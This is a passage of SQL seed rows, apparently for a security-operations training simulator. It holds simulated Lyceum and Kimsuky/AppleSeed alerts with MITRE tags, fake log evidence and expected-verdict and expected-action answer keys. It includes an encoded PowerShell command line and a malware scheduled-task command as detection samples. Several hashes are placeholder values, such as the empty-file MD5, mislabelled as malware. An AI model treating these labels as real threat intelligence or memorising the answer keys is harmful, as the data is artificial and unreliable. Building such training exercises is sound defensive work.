exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for 
exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1345, 'Exfiltration of Sensitive Information', 'critical', 'Outbound Network Traffic Logs', 'The final step involves exfiltrating the harvested data to an external command and control server operated by Lyceum.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:01Z\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"filename\":\"confidential_data.zip\",\"hash\":\"d4c3b4f9a1b0e5d2c1f2e3a4b5c6d7e8\",\"user\":\"jdoe\",\"action\":\"ALLOW\",\"event_id\":\"EVT0001234567\",\"indicator\":\"Lyceum C2 Server\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known Lyceum C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b4f9a1b0e5d2c1f2e3a4b5c6d7e8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"suspicious\",\"details\":\"File name matched with sensitive data pattern\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Active directory user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1346, 'Suspicious Email Detected', 'medium', 'Email Security Gateway', 'A seemingly benign email with a malicious attachment is flagged, marking the start of Kimsuky\'s attempt to infiltrate South Korean networks. The email contained a malicious Excel file attachment that was blocked by the email security system.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"source_email\":\"sender@maliciousdomain.com\",\"destination_email\":\"victim@organization.kr\",\"subject\":\"Urgent: Please Review Attached Document\",\"attachment\":{\"filename\":\"Q3_Report.xlsm\",\"hash\":\"9e107d9d372bb6826bd81d3542a419d6\"},\"malware_detection\":{\"signature\":\"Kimsuky_Malware\",\"result\":\"Detected\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal user system.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"sender@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to multiple phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Q3_Report.xlsm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File contains macro-based 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Kimsuky malware variant.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-03-02T13:55:06.846Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1347, 'AppleSeed Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR) System', 'The malware embedded in the attachment executes, leveraging the AppleSeed backdoor to establish a foothold within the network. An executable was detected running on the host system, which corresponds to known AppleSeed backdoor activity.', 'Malware Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:22:11Z\",\"event_id\":\"EDR-5054\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"workstation-22\",\"user\":\"jdoe\",\"process_name\":\"apple_seed_installer.exe\",\"process_id\":\"4892\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\apple_seed_installer.exe\",\"signature\":\"AppleSeed Backdoor\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous AppleSeed campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with AppleSeed malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"apple_seed_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename matches known AppleSeed backdoor 
installer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1348, 'Persistence Mechanism Activated', 'medium', 'System Logs', 'The system has detected a scheduled task created by Kimsuky to maintain the persistence of the AppleSeed malware, ensuring continued access to the compromised system.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:23Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"attacker_ip\":\"203.0.113.45\",\"scheduled_task_name\":\"AppleSeed_Update\",\"task_command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\AppleSeed.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"status\":\"Task Created\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known campaigns by Kimsuky.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known variant of AppleSeed malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"AppleSeed.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable associated with AppleSeed 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account likely compromised to set up persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c 
C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1349, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'The attackers use harvested credentials to move laterally across the network, seeking sensitive information within government databases. Malicious activity involving external IP 203.0.113.45 attempting to authenticate using compromised credentials was detected.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"event_type\":\"authentication_attempt\",\"username\":\"jdoe\",\"status\":\"failed\",\"protocol\":\"RDP\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"rdp_login_attempt.log\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user within organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known associations with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1350, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Detected attempts to send large volumes of sensitive data outside the network, concluding the attack sequence as Kimsuky seeks to exfiltrate valuable intelligence.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"detection_method\":\"DLP\",\"severity\":\"high\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration attacks by Kimsuky.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged by DLP system during transmission.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"Known file hash, previously scanned and verified as safe.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account, potential insider 
threat.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 